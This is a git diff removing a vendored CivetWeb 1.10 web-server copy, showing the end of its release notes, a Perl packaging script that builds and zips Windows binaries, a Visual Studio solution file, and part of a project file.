-- Allow multiple Sec-Websocket-Protocol
-- Add configuration option to send additional headers
-- Add configuration option for Strict-Transport-Security
-- Mark "file in memory" feature is a candidate for deletion
-- Improve examples
-- Fix timeout error when sending larger files
-- Add mg\_send\_chunk interface function
-- Allow to separate server private key and certificate chain in two different files
-- Support for multipart requests without quotes (for some C# clients)
-- Initialize SSL in mg\_init\_library, so https client functions can be used when no server is running
-- Allow "REPORT" HTTP method for REST calls to scripts
-- Allow to compile civetweb.c wih a C++ compiler
-- Lua: Remove internal length limits of encode/decode functions
-- Allow sub-resources of index script files
-- Add config parameter allow\_index\_script\_resource the aforementioned feature
-- Remove deprecated "uri" member of the request from the interface
-- Improve documentation
-- Make auth domain check optional (configuration)
-- Update unit test framework to check 0.11.0 (C89/C90 compilers still need a patched version)
-- Limit depth of mg.include for Lua server pages
-- Additional unit tests
-- OpenSSL 1.1 support
-- Update version number
-
-
-Release Notes v1.9.1
-===
-### Objectives: *Bug fix*
-
-Changes
--------
-
-- Add "open website" button for pre-built Windows binaries
-- Fix for connections closed prematurely
-- Update to a new check unit test framework and remove patches required for previous version
-- Update version number
-
-
-Release Notes v1.9
-===
-### Objectives: *Read SSI client certificate information, improve windows usability, use non-blocking sockets, bug fixes*
-
-Changes
--------
-
-- Add library init/exit functions (call is now optional, but will be required in V1.10)
-- Windows: Show system information from the tray icon
-- Windows: Bring overlaid windows to top from the tray icon
-- Add Lua background script, running independent from server state
-- Move obsolete examples into separated directory
-- Change name of CMake generated C++ library to civetweb-cpp
-- Add option to set linger timeout
-- Update Duktape and Lua (third-party code)
-- Add continuous integration tests
-- Add API documentation
-- Limit recursions in .htpasswd files
-- Fix SCRIPT_NAME for CGI directory index files (index.php)
-- Use non-blocking sockets
-- stdint.h is now required and no longer optional
-- Rewrite connection close handling
-- Rewrite mg_fopen/mg_stat
-- Enhanced tray icon menu for Windows
-- Add subprotocol management for websocket connections
-- Partially rewrite timeout handling
-- Add option keep_alive_timeout_ms
-- Improve support for absolute URIs
-- Allow some additional compiler checks (higher warning level)
-- Add option for case sensitive file names for Windows
-- Short notation for listening_ports option when using IPv4 and IPv6 ports
-- Make usage of Linux sendfile configurable
-- Optimize build matrix for Travis CI
-- Retry failing TLS/HTTPS read/write operations
-- Read client certificate information
-- Do not tolerate URIs with invalid characters
-- Fix mg_get_cookie to ignore substrings
-- Fix memory leak in form handling
-- Fix bug in timer logic (for Lua Websockets)
-- Updated version number
-
-Release Notes v1.8
-===
-### Objectives: *CMake integration and continuous integration tests, Support client certificates, bug fixes*
-
-Changes
--------
-
-- Replace mg_upload by mg_handle_form_request
-- CGI-scripts must receive EOF if all POST data is read
-- Add API function to handle all kinds of HTML form data
-- Do not allow short file names in Windows
-- Callback when a new thread is initialized
-- Support for short lived certificates
-- Add NO_CACHING compile option
-- Update Visual Studio project files to VS2015; rename directory VS2012 to VS
-- Sec-Wesocket-Protocol must only return one protocol
-- Mark some examples and tests as obsolete
-- Remove no longer maintained test utils
-- Add some default MIME types and the mg_send_mime_file API function.
-- Client API using SSL certificates
-- Send "Cache-Control" headers
-- Add alternative to mg_upload
-- Additional configuration options
-- Fix memory leaks
-- Add API function to check available features
-- Add new interface to get listening ports
-- Add websocket client interface and encode websocket data with a simple random number
-- Support SSL client certificates
-- Add configuration options for SSL client certificates
-- Stand-alone server: Add command line option -I to display information about the system
-- Redirect stderr of CGI process to error log
-- Support absolute URI; split uri in mg_request_info to request_uri and local_uri
-- Some source code refactoring, to improve maintainability
-- Use recursive mutex for Linux
-- Allow CGI environment to grow dynamically
-- Support build for Lua 5.1 (including LuaJIT), Lua 5.2 and Lua 5.3
-- Improve examples and documentation
-- Build option CIVETWEB_SERVE_NO_FILES to disable serving static files
-- Add Server side JavaScript support (Duktape library)
-- Created a "civetweb" organization at GitHub.
-- Repository moved from https://github.com/bel2125/civetweb to https://github.com/civetweb/civetweb
-- Improved continuous integration
-- CMake support, continuous integration with Travis CI and Appveyor
-- Adapt/port unit tests to CMake/Travis/Appveyor
-- Bug fixes, including issues from static code analysis
-- Add status badges to the GitHub project main page
-- Updated version number
-
-Release Notes v1.7
-===
-### Objectives: *Examples, documentation, additional API functions, some functions rewritten, bug fixes and updates*
-
-Changes
--------
-
-- Format source with clang_format
-- Use function 'sendfile' for Linux
-- Fix for CRAMFS in Linux
-- Fix for file modification times in Windows
-- Use SO_EXCLUSIVEADDRUSE instead of SO_REUSEADDR for Windows
-- Rewrite push/pull functions
-- Allow to use Lua as shared objects (WITH_LUA_SHARED)
-- Fixes for many warnings
-- URI specific callbacks and different timeouts for websockets
-- Add chunked transfer support
-- Update LuaFileSystem
-- Update Lua to 5.2.4
-- Fix build for MinGW-x64, TDM-GCC and clang
-- Update SQLite to 3.8.10.2
-- Fix CGI variables SCRIPT_NAME and PATH_TRANSLATED
-- Set TCP_USER_TIMEOUT to deal faster with broken connections
-- Add a Lua form handling example
-- Return more differentiated HTTP error codes
-- Add log_access callback
-- Rewrite and comment request handling function
-- Specify in detail and document return values of callback functions
-- Set names for all threads (unless NO_THREAD_NAME is defined)
-- New API functions for TCP/HTTP clients
-- Fix upload of huge files
-- Allow multiple SSL instances within one application
-- Improve API and user documentation
-- Allow to choose between static and dynamic Lua library
-- Improve unit test
-- Use temporary file name for partially uploaded files
-- Additional API functions exported to C++
-- Add a websocket client example
-- Add a websocket client API
-- Update websocket example
-- Make content length available in request_info
-- New API functions: access context, callback for create/delete, access user data
-- Upgraded Lua from 5.2.2 to 5.2.3 and finally 5.2.4
-- Integrate LuaXML (for testing purposes)
-- Fix compiler warnings
-- Updated version number
-
-Release Notes v1.6
-===
-### Objectives: *Enhance Lua support, configuration dialog for windows, new examples, bug fixes and updates*
-
-Changes
--------
-
-- Add examples of Lua pages, scripts and websockets to the test directory (bel)
-- Add dialog to change htpasswd files for the Windows standalone server (bel)
-- Fix compiler warnings and warnings from static code analysis (Danny Al-Gaaf, jmc-, Thomas, bel, ...)
-- Add new unit tests (bel)
-- Support includes in htpasswd files (bel)
-- Add a basic option check for the standalone executable (bel)
-- Support user defined error pages (bel)
-- Method to get POST request parameters via C++ interface (bel)
-- Re-Add unit tests for Linux and Windows (jmc-, bel)
-- Allow to specify title and tray icon for the Windows standalone server (bel)
-- Fix minor memory leaks (bel)
-- Redirect all memory allocation/deallocation through mg functions which may be overwritten (bel)
-- Support Cross-Origin Resource Sharing (CORS) for static files and scripts (bel)
-- Win32: Replace dll.def file by export macros in civetweb.h (CSTAJ)
-- Base64 encode and decode functions for Lua (bel)
-- Support pre-loaded files for the Lua environment (bel)
-- Server should check the nonce for http digest access authentication (bel)
-- Hide read-only flag in file dialogs opened by the Edit Settings dialog for the Windows executable (bel)
-- Add all functions to dll.def, that are in the header (bel)
-- Added Lua extensions: send_file, get_var, get_mime_type, get_cookie, url_decode, url_encode (bel)
-- mg_set_request_handler() mod to use pattern (bel, Patch from Toni Wilk)
-- Solved, tested and documented SSL support for Windows (bel)
-- Fixed: select for Linux needs the nfds parameter set correctly (bel)
-- Add methods for returning the ports civetweb is listening on (keithel)
-- Fixes for Lua Server Pages, as described within the google groups thread. (bel)
-- Added support for plain Lua Scripts, and an example script. (bel)
-- A completely new, and more illustrative websocket example for C. (bel)
-- Websocket for Lua (bel)
-- An optional websocket_root directory, including URL rewriting (bel)
-- Update of SQLite3 to 3.8.1. (bel)
-- Add "date" header field to replies, according to the requirements of RFC 2616 (the HTTP standard), Section 14.18 (bel)
-- Fix websocket long pull (celeron55)
-- Updated API documentation (Alex Kozlov)
-- Fixed Posix locking functions for Windows (bel2125)
-- Updated version number
-
-Release Notes v1.5
-===
-### Objectives: *Bug fixes and updates, repository restoration*
-
-Changes
--------
-
-- Corrected bad mask flag/opcode passing to websocket callback (William Greathouse)
-- Moved CEVITWEB_VERSION define into civetweb.h
-- Added new simple zip deployment build for Windows.
-- Removed windows install package build.
-- Fixes page violation in mod_lua.inl (apkbox)
-- Use C style comments to enable compiling most of civetweb with -ansi. (F-Secure Corporation)
-- Allow directories with non ASCII characters in Windows in UTF-8 encoded (bel2125)
-- Added Lua File System support (bel2125)
-- Added mongoose history back in repository thanks to (Paul Sokolovsky)
-- Fixed keep alive (bel2125)
-- Updated of MIME types (bel2125)
-- Updated lsqlite (bel2125)
-- Fixed master thread priority (bel2125)
-- Fixed IPV6 defines under Windowe (grenclave)
-- Fixed potential dead lock in connection_close() (Morgan McGuire)
-- Added WebSocket example using asynchronous server messages (William Greathouse)
-- Fixed the getcwd() warning (William Greathouse)
-- Implemented the connection_close() callback (William Greathouse)
-- Fixed support URL's in civetweb.c (Daniel Oaks)
-- Allow port number to be zero to use a random free port (F-Secure Corporation)
-- Wait for threads to finish when stopping for a clean shutdown (F-Secure Corporation)
-- More static analysis fixes against Coverity tool (F-Secure Corporation)
-- Travis automated build testing support added (Daniel Oaks)
-- Updated version numbers.
-- Added contributor credits file.
-
-Release Notes v1.4
-===
-### Objectives: *New URI handler interface, feature enhancements, C++ extensions*
-The main idea behind this release is to bring about API consistency. All changes
-are backward compatible and have been kept to a minimum.
-
-Changes
--------
-
-- Added mg_set_request_handler() which provides a URI mapping for callbacks.
-   This is a new alternative to overriding callbacks.begin_request.
-- Externalized mg_url_encode()
-- Externalized mg_strncasecmp() for utiliy
-- Added CivetServer::getParam methods
-- Added CivetServer::urlDecode methods
-- Added CivetServer::urlEncode methods
-- Dealt with compiler warnings and some static analysis hits.
-- Added mg_get_var2() to parse repeated query variables
-- Externalized logging function cry() as mg_cry()
-- Added CivetServer::getCookie method (Hariprasad Kamath)
-- Added CivetServer::getHeader method (Hariprasad Kamath)
-- Added new basic C embedding example
-- Conformed source files to UNIX line endings for consistency.
-- Unified the coding style to improve reability.
-
-Release Notes v1.3
-===
-### Objectives: *Buildroot Integration*
-
-Changes
--------
-
-- Made option to put initial HTMLDIR in a different place
-- Validated build without SQLITE3 large file support
-- Updated documentation
-- Updated Buildroot config example
-
-Release Notes v1.2
-===
-### Objectives: *Installation Improvements, buildroot, cross compile support*
-The objective of this release is to make installation seamless.
-
-Changes
--------
-
-- Create an installation guide
-- Created both 32 and 64 bit windows installations
-- Added install for windows distribution
-- Added 64 bit build profiles for VS 2012.
-- Created a buildroot patch
-- Updated makefile to better support buildroot
-- Made doc root and ports configurable during the make install.
-- Updated Linux Install
-- Updated OS X Package
-- Improved install scheme with welcome web page
-
-Known Issues
------
-
-- The prebuilt Window's version requires [Visual C++ Redistributable for Visual Studio 2012](http://www.microsoft.com/en-us/download/details.aspx?id=30679)
-
-Release Notes v1.1
-===
-### Objectives: *Build, Documentation, License Improvements*
-The objective of this release is to establish a maintable code base, ensure MIT license rights and improve usability and documentation.
-
-Changes
--------
-
-- Reorangized build directories to make them more intuitive
-- Added new build rules for lib and slib with option to include C++ class
-- Upgraded Lua from 5.2.1 to 5.2.2
-- Added fallback configuration file path for Linux systems.
-    + Good for having a system wide default configuration /usr/local/etc/civetweb.conf
-- Added new C++ abstraction class CivetServer
-- Added thread safety for and fixed websocket defects (Morgan McGuire)
-- Created PKGBUILD to use Arch distribution (Daniel Oaks)
-- Created new documentation on Embeddeding, Building and yaSSL (see docs/).
-- Updated License file to include all licenses.
-- Replaced MD5 implementation due to questionable license.
-     + This requires new source file md5.inl
-- Changed UNIX/OSX build to conform to common practices.
-     + Supports build, install and clean rules.
-     + Supports cross compiling
-     + Features can be chosen in make options
-- Moved Cocoa/OSX build and packaging to a separate file.
-     + This actually a second build variant for OSX.
-     + Removed yaSSL from the OSX build, not needed.
-- Added new Visual Studio projects for Windows builds.
-     + Removed Windows support from Makefiles
-     + Provided additional, examples with Lua, and another with yaSSL.
-- Changed Zombie Reaping policy to not ignore SIGCHLD.
-     + The previous method caused trouble in applciations that spawn children.
-
-Known Issues
------
-
-- Build support for VS6 and some other has been deprecated.
-    + This does not impact embedded programs, just the stand-alone build.
-    + The old Makefile was renamed to Makefile.deprecated.
-    + This is partcially do to lack fo testing.
-    + Need to find out what is actually in demand.
-- Build changes may impact current users.
-    + As with any change of this type, changes may impact some users.
-
-Release Notes v1.0
-===
-
-### Objectives: *MIT License Preservation, Rebranding*
-The objective of this release is to establish a version of the Mongoose software distribution that still retains the MIT license.
-
-Changes
--------
-
-- Renamed Mongoose to Civetweb in the code and documentation.
-- Replaced copyrighted images with new images
-- Created a new code respository at https://github.com/civetweb/civetweb
-- Created a distribution site at https://sourceforge.net/projects/civetweb/
-- Basic build testing
diff --git a/thirdparty/civetweb-1.10/VisualStudio/buildRelease.pl b/thirdparty/civetweb-1.10/VisualStudio/buildRelease.pl
deleted file mode 100644
index df8db09..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/buildRelease.pl
+++ /dev/null
@@ -1,71 +0,0 @@
-#!/usr/bin/perl
-# 
-# Copyright (c) 2013 No Face Press, LLC
-# License http://opensource.org/licenses/mit-license.php MIT License
-#
-
-# This script builds and packages a Windows release.
-# It requires ActiveState Perl to use and is intended
-# to be run from the its directory under the 
-# VS Developer Command Prompt.
-
-# Create a Zip file
-use Archive::Zip qw( :ERROR_CODES :CONSTANTS );
-my $zip = Archive::Zip->new();
-
-my $src = "..";
-
-sub getCivetwebVersion {
-    print "Fetching CivetWeb version...\n";
-    open HEADER, "${src}/include/civetweb.h";
-    while (<HEADER>) {
-        if (m/define\s+CIVETWEB_VERSION\s+"(.+)"/) {
-            close HEADER;
-            return $1;
-        }
-    }
-    close HEADER;
-    return "UNKNOWN_VERSION";
-}
-
-my $CIVETWEB_VERSION = getCivetwebVersion();
-my $basename         = "civetweb-$CIVETWEB_VERSION";
-my $dir              = "${basename}";
-
-sub build32() {
-    print "\nBuilding Win32 Release version...\n";
-    system("msbuild /p:Configuration=Release /p:Platform=Win32 civetweb.sln");
-}
-
-sub build64() {
-    print "\nBuilding x64 Release version...\n";
-    system("msbuild /p:Configuration=Release /p:Platform=x64 civetweb.sln");
-}
-
-sub writeArchive() {
-    my $archive = "${basename}-win.zip";
-    print "Creating archive $archive ...\n";
-
-    $zip->addDirectory("${dir}/");
-
-    $zip->addFile( "${src}/LICENSE.md",            "${dir}/LICENSE.md" );
-    $zip->addFile( "${src}/README.md",             "${dir}/README.md" );
-    $zip->addFile( "${src}/resources/systray.ico", "${dir}/systray.ico" );
-    $zip->addFile( "${src}/resources/civetweb_64x64.png",
-        "${dir}/civetweb_64x64.png" );
-    $zip->addFile( "${src}/resources/itworks.html", "${dir}/index.html" );
-    $zip->addFile( "${src}/VS2012/Release/Win32/civetweb_lua.exe",
-        "${dir}/civetweb32.exe" );
-    $zip->addFile( "${src}/VS2012/Release/x64/civetweb_lua.exe",
-        "${dir}/civetweb64.exe" );
-
-    unless ( $zip->writeToFileNamed($archive) == AZ_OK ) {
-        die 'write error';
-    }
-
-}
-
-build32();
-build64();
-writeArchive();
-exit 0;
diff --git a/thirdparty/civetweb-1.10/VisualStudio/civetweb.sln b/thirdparty/civetweb-1.10/VisualStudio/civetweb.sln
deleted file mode 100644
index 0e8672b..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/civetweb.sln
+++ /dev/null
@@ -1,75 +0,0 @@
-

-Microsoft Visual Studio Solution File, Format Version 12.00

-# Visual Studio 14

-VisualStudioVersion = 14.0.25420.1

-MinimumVisualStudioVersion = 10.0.40219.1

-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "civetweb_lua", "civetweb_lua\civetweb_lua.vcxproj", "{9BE9C008-E851-42B1-A034-BD4630AE4CD6}"

-	ProjectSection(ProjectDependencies) = postProject

-		{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD} = {0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}

-	EndProjectSection

-EndProject

-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "lua_lib", "lua_lib\lua_lib.vcxproj", "{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}"

-EndProject

-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ex_embedded_c", "ex_embedded_c\ex_embedded_c.vcxproj", "{882EC43C-2EEE-434B-A711-C844108D29C6}"

-EndProject

-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "unit_test", "unit_test\unit_test.vcxproj", "{1AC4A7A6-0100-4287-97F4-B95807BE5607}"

-EndProject

-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "duktape_lib", "duktape_lib\duktape_lib.vcxproj", "{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}"

-EndProject

-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ex_embed_cpp", "ex_embed_cpp\ex_embed_cpp.vcxproj", "{4308C5EE-45E4-45D8-9D73-6C4E2587AD78}"

-EndProject

-Global

-	GlobalSection(SolutionConfigurationPlatforms) = preSolution

-		Debug|Win32 = Debug|Win32

-		Debug|x64 = Debug|x64

-		Release|Win32 = Release|Win32

-		Release|x64 = Release|x64

-	EndGlobalSection

-	GlobalSection(ProjectConfigurationPlatforms) = postSolution

-		{9BE9C008-E851-42B1-A034-BD4630AE4CD6}.Debug|Win32.ActiveCfg = Debug|Win32

-		{9BE9C008-E851-42B1-A034-BD4630AE4CD6}.Debug|Win32.Build.0 = Debug|Win32

-		{9BE9C008-E851-42B1-A034-BD4630AE4CD6}.Debug|x64.ActiveCfg = Debug|x64

-		{9BE9C008-E851-42B1-A034-BD4630AE4CD6}.Debug|x64.Build.0 = Debug|x64

-		{9BE9C008-E851-42B1-A034-BD4630AE4CD6}.Release|Win32.ActiveCfg = Release|Win32

-		{9BE9C008-E851-42B1-A034-BD4630AE4CD6}.Release|Win32.Build.0 = Release|Win32

-		{9BE9C008-E851-42B1-A034-BD4630AE4CD6}.Release|x64.ActiveCfg = Release|x64

-		{9BE9C008-E851-42B1-A034-BD4630AE4CD6}.Release|x64.Build.0 = Release|x64

-		{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}.Debug|Win32.ActiveCfg = Debug|Win32

-		{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}.Debug|Win32.Build.0 = Debug|Win32

-		{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}.Debug|x64.ActiveCfg = Debug|x64

-		{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}.Debug|x64.Build.0 = Debug|x64

-		{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}.Release|Win32.ActiveCfg = Release|Win32

-		{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}.Release|Win32.Build.0 = Release|Win32

-		{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}.Release|x64.ActiveCfg = Release|x64

-		{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}.Release|x64.Build.0 = Release|x64

-		{882EC43C-2EEE-434B-A711-C844108D29C6}.Debug|Win32.ActiveCfg = Debug|Win32

-		{882EC43C-2EEE-434B-A711-C844108D29C6}.Debug|Win32.Build.0 = Debug|Win32

-		{882EC43C-2EEE-434B-A711-C844108D29C6}.Debug|x64.ActiveCfg = Debug|x64

-		{882EC43C-2EEE-434B-A711-C844108D29C6}.Release|Win32.ActiveCfg = Release|Win32

-		{882EC43C-2EEE-434B-A711-C844108D29C6}.Release|Win32.Build.0 = Release|Win32

-		{882EC43C-2EEE-434B-A711-C844108D29C6}.Release|x64.ActiveCfg = Release|x64

-		{1AC4A7A6-0100-4287-97F4-B95807BE5607}.Debug|Win32.ActiveCfg = Debug|Win32

-		{1AC4A7A6-0100-4287-97F4-B95807BE5607}.Debug|Win32.Build.0 = Debug|Win32

-		{1AC4A7A6-0100-4287-97F4-B95807BE5607}.Debug|x64.ActiveCfg = Debug|Win32

-		{1AC4A7A6-0100-4287-97F4-B95807BE5607}.Release|Win32.ActiveCfg = Release|Win32

-		{1AC4A7A6-0100-4287-97F4-B95807BE5607}.Release|Win32.Build.0 = Release|Win32

-		{1AC4A7A6-0100-4287-97F4-B95807BE5607}.Release|x64.ActiveCfg = Release|Win32

-		{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}.Debug|Win32.ActiveCfg = Debug|Win32

-		{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}.Debug|Win32.Build.0 = Debug|Win32

-		{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}.Debug|x64.ActiveCfg = Debug|x64

-		{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}.Debug|x64.Build.0 = Debug|x64

-		{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}.Release|Win32.ActiveCfg = Release|Win32

-		{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}.Release|Win32.Build.0 = Release|Win32

-		{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}.Release|x64.ActiveCfg = Release|x64

-		{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}.Release|x64.Build.0 = Release|x64

-		{4308C5EE-45E4-45D8-9D73-6C4E2587AD78}.Debug|Win32.ActiveCfg = Debug|Win32

-		{4308C5EE-45E4-45D8-9D73-6C4E2587AD78}.Debug|Win32.Build.0 = Debug|Win32

-		{4308C5EE-45E4-45D8-9D73-6C4E2587AD78}.Debug|x64.ActiveCfg = Debug|x64

-		{4308C5EE-45E4-45D8-9D73-6C4E2587AD78}.Release|Win32.ActiveCfg = Release|Win32

-		{4308C5EE-45E4-45D8-9D73-6C4E2587AD78}.Release|Win32.Build.0 = Release|Win32

-		{4308C5EE-45E4-45D8-9D73-6C4E2587AD78}.Release|x64.ActiveCfg = Release|x64

-	EndGlobalSection

-	GlobalSection(SolutionProperties) = preSolution

-		HideSolutionNode = FALSE

-	EndGlobalSection

-EndGlobal

diff --git a/thirdparty/civetweb-1.10/VisualStudio/civetweb_lua/civetweb_lua.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/civetweb_lua/civetweb_lua.vcxproj
deleted file mode 100644
index 45f8bbe..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/civetweb_lua/civetweb_lua.vcxproj
+++ /dev/null
@@ -1,216 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{9BE9C008-E851-42B1-A034-BD4630AE4CD6}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>civetweb_lua</RootNamespace>

-    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140_xp</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug CONSOLE|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v110</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140_xp</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug CONSOLE|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug CONSOLE|x64'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_SERVER_STATS;USE_DUKTAPE;USE_IPV6;LUA_COMPAT_ALL;USE_LUA;USE_LUA_SQLITE3;USE_LUA_FILE_SYSTEM;USE_WEBSOCKET;WIN32;_DEBUG;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;$(ProjectDir)..\..\src\third_party;$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;$(ProjectDir)..\..\src\third_party\duktape-1.5.2\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_SERVER_STATS;USE_DUKTAPE;USE_IPV6;LUA_COMPAT_ALL;USE_LUA;USE_LUA_SQLITE3;USE_LUA_FILE_SYSTEM;USE_WEBSOCKET;WIN32;_DEBUG;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

